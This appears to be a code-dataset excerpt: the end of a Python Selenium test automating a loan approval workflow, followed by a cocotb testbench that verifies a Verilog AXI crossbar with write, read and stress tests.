todopage.input_yewuno(self.loanno)
todopage.click_query_all()
todopage.click_search_button()
todopage.click_first_row(types)
approveinterviepage.scroll_to_approve_view()
approveinterviepage.input_approve_view(approve_view)
approveinterviepage.click_tongguo()
approveinterviepage.click_confirm()
time.sleep(5)
todopage.click_first_row(types)
approveinterviepage.scroll_to_is_phone_check()
approveinterviepage.select_is_phone_check(isphonecheck)
approveinterviepage.input_phone_check_message(phonecheckmessage)
approveinterviepage.click_phone_save_button()
time.sleep(1)
approveinterviepage.select_is_fujian_over(isfujianover)
approveinterviepage.click_fujian_save_button()
time.sleep(1)
approveinterviepage.scroll_to_approve_view()
approveinterviepage.input_approve_view(approve_view)
approveinterviepage.click_tongguo()
approveinterviepage.click_confirm()
time.sleep(5)
todopage.click_first_row(types)
approveinterviepage.scroll_to_card_date()
approveinterviepage.input_card_daoqi_date(card_daoqi_date)
approveinterviepage.click_save_bank_loan_data()
time.sleep(1)
tools.create_huankuanjihua(self.fullname)
approveinterviepage.input_file(file_path)
time.sleep(3)
approveinterviepage.input_approve_view(approve_view)
approveinterviepage.click_tongguo()
approveinterviepage.click_confirm()
time.sleep(5)
menu.go_to_loan_query(self.driver)
actual_result = approveinterviepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("审批面签提报结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_l_loan_clear(self):
u"""贷款结清"""
casename = sys._getframe().f_code.co_name
payname = self.fullname
# self.loanno = "SK0027-BP-1801-00002"
from com.ea.common import loan_clear
loan_clear.loan_clear(self.driver, payname, self.loanno, casename, self.screenshot_path, )
def test_m_loan_clear_approve(self):
u"""审批贷款结清流程"""
casename = sys._getframe().f_code.co_name
from com.ea.common import loan_clear
loan_clear.loan_clear_approve(self.driver, self.loanno, self.screenshot_path, casename)
if __name__ == '__main__':
unittest.main()
| [
"lijie"
] | lijie | |
d54d706d83747cf914fb4c1c78c528103f7b8930 | 6b8681327ca166cf0f04891fa78f124e27ab85d7 | /tb/axi_crossbar/test_axi_crossbar.py | e647a5c2ca6fea817fe347b85cabc41702775f4f | [
"MIT"
] | permissive | jerry-jho/verilog-axi | d95657e8b8443f8d58032cb642c897fb7efa4e3a | fbb507be8218fd61a58e364de6c8f73dda0709d7 | refs/heads/master | 2021-12-14T12:37:17.797360 | 2021-11-15T22:31:28 | 2021-11-15T22:31:28 | 237,615,694 | 0 | 0 | MIT | 2020-02-01T13:01:29 | 2020-02-01T13:01:28 | null | UTF-8 | Python | false | false | 10,404 | py | """
Copyright (c) 2020 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import itertools
import logging
import os
import random
import subprocess
import cocotb_test.simulator
import pytest
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge, Timer
from cocotb.regression import TestFactory
from cocotbext.axi import AxiBus, AxiMaster, AxiRam
class TB(object):
def __init__(self, dut):
self.dut = dut
s_count = len(dut.axi_crossbar_inst.s_axi_awvalid)
m_count = len(dut.axi_crossbar_inst.m_axi_awvalid)
self.log = logging.getLogger("cocotb.tb")
self.log.setLevel(logging.DEBUG)
cocotb.fork(Clock(dut.clk, 10, units="ns").start())
self.axi_master = [AxiMaster(AxiBus.from_prefix(dut, f"s{k:02d}_axi"), dut.clk, dut.rst) for k in range(s_count)]
self.axi_ram = [AxiRam(AxiBus.from_prefix(dut, f"m{k:02d}_axi"), dut.clk, dut.rst, size=2**16) for k in range(m_count)]
for ram in self.axi_ram:
# prevent X propagation from screwing things up - "anything but X!"
# (X on bid and rid can propagate X to ready/valid)
ram.write_if.b_channel.bus.bid.setimmediatevalue(0)
ram.read_if.r_channel.bus.rid.setimmediatevalue(0)
def set_idle_generator(self, generator=None):
if generator:
for master in self.axi_master:
master.write_if.aw_channel.set_pause_generator(generator())
master.write_if.w_channel.set_pause_generator(generator())
master.read_if.ar_channel.set_pause_generator(generator())
for ram in self.axi_ram:
ram.write_if.b_channel.set_pause_generator(generator())
ram.read_if.r_channel.set_pause_generator(generator())
def set_backpressure_generator(self, generator=None):
if generator:
for master in self.axi_master:
master.write_if.b_channel.set_pause_generator(generator())
master.read_if.r_channel.set_pause_generator(generator())
for ram in self.axi_ram:
ram.write_if.aw_channel.set_pause_generator(generator())
ram.write_if.w_channel.set_pause_generator(generator())
ram.read_if.ar_channel.set_pause_generator(generator())
async def cycle_reset(self):
self.dut.rst.setimmediatevalue(0)
await RisingEdge(self.dut.clk)
await RisingEdge(self.dut.clk)
self.dut.rst.value = 1
await RisingEdge(self.dut.clk)
await RisingEdge(self.dut.clk)
self.dut.rst.value = 0
await RisingEdge(self.dut.clk)
await RisingEdge(self.dut.clk)
async def run_test_write(dut, data_in=None, idle_inserter=None, backpressure_inserter=None, size=None, s=0, m=0):
tb = TB(dut)
byte_lanes = tb.axi_master[s].write_if.byte_lanes
max_burst_size = tb.axi_master[s].write_if.max_burst_size
if size is None:
size = max_burst_size
await tb.cycle_reset()
tb.set_idle_generator(idle_inserter)
tb.set_backpressure_generator(backpressure_inserter)
for length in list(range(1, byte_lanes*2))+[1024]:
for offset in list(range(byte_lanes, byte_lanes*2))+list(range(4096-byte_lanes, 4096)):
tb.log.info("length %d, offset %d, size %d", length, offset, size)
ram_addr = offset+0x1000
addr = ram_addr + m*0x1000000
test_data = bytearray([x % 256 for x in range(length)])
tb.axi_ram[m].write(ram_addr-128, b'\xaa'*(length+256))
await tb.axi_master[s].write(addr, test_data, size=size)
tb.log.debug("%s", tb.axi_ram[m].hexdump_str((ram_addr & ~0xf)-16, (((ram_addr & 0xf)+length-1) & ~0xf)+48))
assert tb.axi_ram[m].read(ram_addr, length) == test_data
assert tb.axi_ram[m].read(ram_addr-1, 1) == b'\xaa'
assert tb.axi_ram[m].read(ram_addr+length, 1) == b'\xaa'
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
async def run_test_read(dut, data_in=None, idle_inserter=None, backpressure_inserter=None, size=None, s=0, m=0):
tb = TB(dut)
byte_lanes = tb.axi_master[s].write_if.byte_lanes
max_burst_size = tb.axi_master[s].write_if.max_burst_size
if size is None:
size = max_burst_size
await tb.cycle_reset()
tb.set_idle_generator(idle_inserter)
tb.set_backpressure_generator(backpressure_inserter)
for length in list(range(1, byte_lanes*2))+[1024]:
for offset in list(range(byte_lanes, byte_lanes*2))+list(range(4096-byte_lanes, 4096)):
tb.log.info("length %d, offset %d, size %d", length, offset, size)
ram_addr = offset+0x1000
addr = ram_addr + m*0x1000000
test_data = bytearray([x % 256 for x in range(length)])
tb.axi_ram[m].write(ram_addr, test_data)
data = await tb.axi_master[s].read(addr, length, size=size)
assert data.data == test_data
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
async def run_stress_test(dut, idle_inserter=None, backpressure_inserter=None):
tb = TB(dut)
await tb.cycle_reset()
tb.set_idle_generator(idle_inserter)
tb.set_backpressure_generator(backpressure_inserter)
async def worker(master, offset, aperture, count=16):
for k in range(count):
m = random.randrange(len(tb.axi_ram))
length = random.randint(1, min(512, aperture))
addr = offset+random.randint(0, aperture-length) + m*0x1000000
test_data = bytearray([x % 256 for x in range(length)])
await Timer(random.randint(1, 100), 'ns')
await master.write(addr, test_data)
await Timer(random.randint(1, 100), 'ns')
data = await master.read(addr, length)
assert data.data == test_data
workers = []
for k in range(16):
workers.append(cocotb.fork(worker(tb.axi_master[k % len(tb.axi_master)], k*0x1000, 0x1000, count=16)))
while workers:
await workers.pop(0).join()
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
def cycle_pause():
return itertools.cycle([1, 1, 1, 0])
if cocotb.SIM_NAME:
s_count = len(cocotb.top.axi_crossbar_inst.s_axi_awvalid)
m_count = len(cocotb.top.axi_crossbar_inst.m_axi_awvalid)
data_width = len(cocotb.top.s00_axi_wdata)
byte_lanes = data_width // 8
max_burst_size = (byte_lanes-1).bit_length()
for test in [run_test_write, run_test_read]:
factory = TestFactory(test)
factory.add_option("idle_inserter", [None, cycle_pause])
factory.add_option("backpressure_inserter", [None, cycle_pause])
# factory.add_option("size", [None]+list(range(max_burst_size)))
factory.add_option("s", range(min(s_count, 2)))
factory.add_option("m", range(min(m_count, 2)))
factory.generate_tests()
factory = TestFactory(run_stress_test)
factory.generate_tests()
# cocotb-test
tests_dir = os.path.abspath(os.path.dirname(__file__))
rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl'))
@pytest.mark.parametrize("data_width", [8, 16, 32])
@pytest.mark.parametrize("m_count", [1, 4])
@pytest.mark.parametrize("s_count", [1, 4])
def test_axi_crossbar(request, s_count, m_count, data_width):
dut = "axi_crossbar"
wrapper = f"{dut}_wrap_{s_count}x{m_count}"
module = os.path.splitext(os.path.basename(__file__))[0]
toplevel = wrapper
# generate wrapper
wrapper_file = os.path.join(tests_dir, f"{wrapper}.v")
if not os.path.exists(wrapper_file):
subprocess.Popen(
[os.path.join(rtl_dir, f"{dut}_wrap.py"), "-p", f"{s_count}", f"{m_count}"],
cwd=tests_dir
).wait()
verilog_sources = [
wrapper_file,
os.path.join(rtl_dir, f"{dut}.v"),
os.path.join(rtl_dir, f"{dut}_addr.v"),
os.path.join(rtl_dir, f"{dut}_rd.v"),
os.path.join(rtl_dir, f"{dut}_wr.v"),
os.path.join(rtl_dir, "axi_register_rd.v"),
os.path.join(rtl_dir, "axi_register_wr.v"),
os.path.join(rtl_dir, "arbiter.v"),
os.path.join(rtl_dir, "priority_encoder.v"),
]
parameters = {}
parameters['S_COUNT'] = s_count
parameters['M_COUNT'] = m_count
parameters['DATA_WIDTH'] = data_width
parameters['ADDR_WIDTH'] = 32
parameters['STRB_WIDTH'] = parameters['DATA_WIDTH'] // 8
parameters['S_ID_WIDTH'] = 8
parameters['M_ID_WIDTH'] = parameters['S_ID_WIDTH'] + (s_count-1).bit_length()
parameters['AWUSER_ENABLE'] = 0
parameters['AWUSER_WIDTH'] = 1
parameters['WUSER_ENABLE'] = 0
parameters['WUSER_WIDTH'] = 1
parameters['BUSER_ENABLE'] = 0
parameters['BUSER_WIDTH'] = 1
parameters['ARUSER_ENABLE'] = 0
parameters['ARUSER_WIDTH'] = 1
parameters['RUSER_ENABLE'] = 0
parameters['RUSER_WIDTH'] = 1
parameters['M_REGIONS'] = 1
extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()}
sim_build = os.path.join(tests_dir, "sim_build",
request.node.name.replace('[', '-').replace(']', ''))
cocotb_test.simulator.run(
python_search=[tests_dir],
verilog_sources=verilog_sources,
toplevel=toplevel,
module=module,
parameters=parameters,
sim_build=sim_build,
extra_env=extra_env,
)
| [
"alex@alexforencich.com"
] | alex@alexforencich.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.